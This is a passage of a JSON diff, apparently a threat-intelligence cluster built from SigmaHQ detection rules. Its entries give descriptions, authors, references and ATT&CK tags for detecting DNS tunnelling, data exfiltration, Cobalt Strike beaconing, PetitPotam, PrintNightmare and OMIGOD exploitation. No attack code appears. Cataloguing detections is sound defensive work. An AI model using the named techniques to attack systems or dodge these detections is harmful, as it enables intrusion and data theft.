"tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", + "value": "Cisco Show 
Commands Input" + }, + { + "description": "Find local accounts being created or modified as well as remote authentication configurations", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "When remote authentication is in place, this should not change often" + ], + "filename": "cisco_cli_local_accounts.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ] + }, + "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", + "value": "Cisco Local Accounts" + }, + { + "description": "Modifications to a config that will serve an adversary's impacts or persistence", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "filename": "cisco_cli_modify_config.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.impact", + "attack.t1490", + "attack.t1505", + "attack.t1565.002", + "attack.t1053" + ] + }, + "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", + "value": "Cisco Modify Configuration" + }, + { + "description": "Various protocols maybe used to put data on the device for exfil or infil", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Generally used to copy configs or IOS images" + ], + "filename": "cisco_cli_moving_data.yml", + "level": "low", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" + ], + "tags": [ + 
"attack.collection", + "attack.lateral_movement", + "attack.command_and_control", + "attack.exfiltration", + "attack.t1074", + "attack.t1105", + "attack.t1560.001" + ] + }, + "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", + "value": "Cisco Stage Data" + }, + { + "description": "Show when a monitor or a span/rspan is setup or modified", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Admins may setup new or modify old spans, or use a monitor for troubleshooting" + ], + "filename": "cisco_cli_net_sniff.yml", + "level": "medium", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", + "value": "Cisco Sniffing" + }, + { + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. 
This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/07", + "falsepositive": [ + "Valid software, which uses dns for transferring data" + ], + "filename": "net_dns_c2_detection.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004", + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "value": "Possible DNS Tunneling" + }, + { + "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", + "meta": { + "author": "Florian Roth, Matt Kelly (list of domains)", + "creation_date": "2022/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_external_service_interaction_domains.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/breakersall/status/1533493587828260866", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.reconnaissance", + "attack.t1595.002" + ] + }, + "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", + "value": "DNS Query to External Service Interaction Domains" + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS bytes out rate 
to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_bytes_out.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", + "value": "High DNS Bytes Out" + }, + { + "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_null_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", + "value": "High NULL Records Requests Rate" + }, + { + "description": "High DNS requests amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + 
"attack.t1071.004" + ] + }, + "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", + "value": "High DNS Requests Rate" + }, + { + "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_txt_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", + "value": "High TXT Records Requests Rate" + }, + { + "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", + "value": "Cobalt Strike DNS Beaconing" + }, + { + "description": "Detects suspicious DNS queries to Monero mining pools", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/24", + "falsepositive": [ + "Legitimate crypto coin mining" + ], + 
"filename": "net_dns_pua_cryptocoin_mining_xmr.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496", + "attack.t1567" + ] + }, + "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", + "value": "Monero Crypto Coin Mining Pool Lookup" + }, + { + "description": "Detects suspicious DNS queries using base64 encoding", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_b64_queries.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/krmaxwell/dns-exfiltration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", + "value": "Suspicious DNS Query with B64 Encoded String" + }, + { + "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "net_dns_susp_telegram_api.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + 
"https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102.002" + ] + }, + "uuid": "c64c5175-5189-431b-a55e-6d9882158251", + "value": "Telegram Bot API Request" + }, + { + "description": "Detects strings used in command execution in DNS TXT Answer", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_txt_exec_strings.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", + "value": "DNS TXT Answer with Possible Execution Strings" + }, + { + "description": "Detects wannacry killswitch domain dns queries", + "meta": { + "author": "Mike Wade", + "creation_date": "2020/09/16", + "falsepositive": [ + "Analyst testing" + ], + "filename": "net_dns_wannacry_killswitch_domain.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", + "value": "Wannacry Killswitch Domain" + }, + { + "description": "Detects communication to C2 servers 
mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "net_firewall_apt_equationgroup_c2.yml", + "level": "high", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.g0020", + "attack.t1041" + ] + }, + "uuid": "881834a4-6659-4773-821e-1c151789d873", + "value": "Equation Group C2 Communication" + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "filename": "net_firewall_high_dns_bytes_out.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "3b6e327d-8649-4102-993f-d25786481589", + "value": "High DNS Bytes Out - Firewall" + }, + { + "description": "High DNS requests amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "filename": "net_firewall_high_dns_requests_rate.yml", + "level": "medium", + "logsource.category": "firewall", + 
"logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "51186749-7415-46be-90e5-6914865c825a", + "value": "High DNS Requests Rate - Firewall" + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "filename": "net_firewall_susp_network_scan_by_ip.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "4601eaec-6b45-4052-ad32-2d96d26ce0d8", + "value": "Network Scans Count By Destination IP" + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "filename": "net_firewall_susp_network_scan_by_port.yml", + "level": "medium", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", + "value": "Network Scans Count By Destination Port" + }, + { + "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. 
Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "meta": { + "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", + "creation_date": "2020/05/03", + "falsepositive": [ + "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1082" + ] + }, + "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", + "value": "Domain User Enumeration Network Recon 01" + }, + { + "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. 
All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", + "meta": { + "author": "@neu5ron, SOC Prime", + "creation_date": "2020/03/19", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053.002", + "attack.t1569.002" + ] + }, + "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", + "value": "MITRE BZAR Indicators for Execution" + }, + { + "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", + "meta": { + "author": "@neu5ron, SOC Prime", + "creation_date": "2020/03/19", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", + "value": "MITRE BZAR Indicators for Persistence" + }, + { + "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). 
Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", + "meta": { + "author": "@neu5ron, @Antonlovesdnb, Mike Remen", + "creation_date": "2021/08/17", + "falsepositive": [ + "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." + ], + "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" + ], + "tags": [ + "attack.t1557.001", + "attack.t1187" + ] + }, + "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", + "value": "Potential PetitPotam Attack Via EFS RPC Calls" + }, + { + "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", + "meta": { + "author": "@neu5ron (Nate Guagenti)", + 
"creation_date": "2021/08/23", + "falsepositive": [ + "Legitimate remote alteration of a printer driver." + ], + "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/corelight/CVE-2021-1675", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.1678", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", + "value": "Possible PrintNightmare Print Driver Install" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research), @neu5ron", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" + ], + "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", + "value": "SMB Spoolss Name Piped Usage" + }, + { + "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/06/23", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_default_cobalt_strike_certificate.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.s0154" + ] + }, + "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", + "value": "Default Cobalt Strike Certificate" + }, + { + "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", + "meta": { + "author": 
"Saw Winn Naung, Azure-Sentinel, @neu5ron", + "creation_date": "2021/08/19", + "falsepositive": [ + "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." + ], + "filename": "zeek_dns_mining_pools.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" + ], + "tags": [ + "attack.t1569.002", + "attack.t1496" + ] + }, + "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", + "value": "DNS Events Related To Mining Pools" + }, + { + "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. 
This rule looks for a DNS request to the ma>", + "meta": { + "author": "Michael Portera (@mportatoes)", + "creation_date": "2022/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_nkn.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/nknorg/nkn-sdk-go", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://github.com/Maka8ka/NGLite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", + "value": "New Kind of Network (NKN) Detection" + }, + { + "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", + "meta": { + "author": "@neu5ron, SOC Prime Team, Corelight", + "creation_date": "2021/05/04", + "falsepositive": [ + "Internal or legitimate external domains using DNSSec. 
Verify if these are legitimate DNSSec domains and then exclude them.", + "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" + ], + "filename": "zeek_dns_susp_zbit_flag.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" + ], + "tags": [ + "attack.t1095", + "attack.t1571", + "attack.command_and_control" + ] + }, + "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", + "value": "Suspicious DNS Z Flag Bit Set" + }, + { + "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", + "meta": { + "author": "Saw Winn Naung , Azure-Sentinel", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_torproxy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" + ], + "tags": [ + "attack.t1048" + ] + }, + "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", + "value": "DNS TOR Proxies" + }, + { + "description": "Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", + "meta": { + "author": "SOC Prime, Adam Swan", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_executable_download_from_webdav.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", + "value": "Executable from Webdav" + }, + { + "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", + "meta": { + "author": "Nate Guagenti (neu5ron)", + "creation_date": "2021/09/20", + "falsepositive": [ + "Exploits that were attempted but unsuccessful.", + "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." 
+ ], + "filename": "zeek_http_omigod_no_auth_rce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://twitter.com/neu5ron/status/1438987292971053057?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.lateral_movement", + "attack.t1068", + "attack.t1190", + "attack.t1203", + "attack.t1021.006", + "attack.t1210" + ] + }, + "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", + "value": "OMIGOD HTTP No Authentication RCE" + }, + { + "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_webdav_put_request.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", + "value": "WebDav Put Request" + }, + { + "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", + "meta": { + "author": "Josh Brower @DefensiveDepth", + "creation_date": "2020/08/22", + "falsepositive": [ + "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been 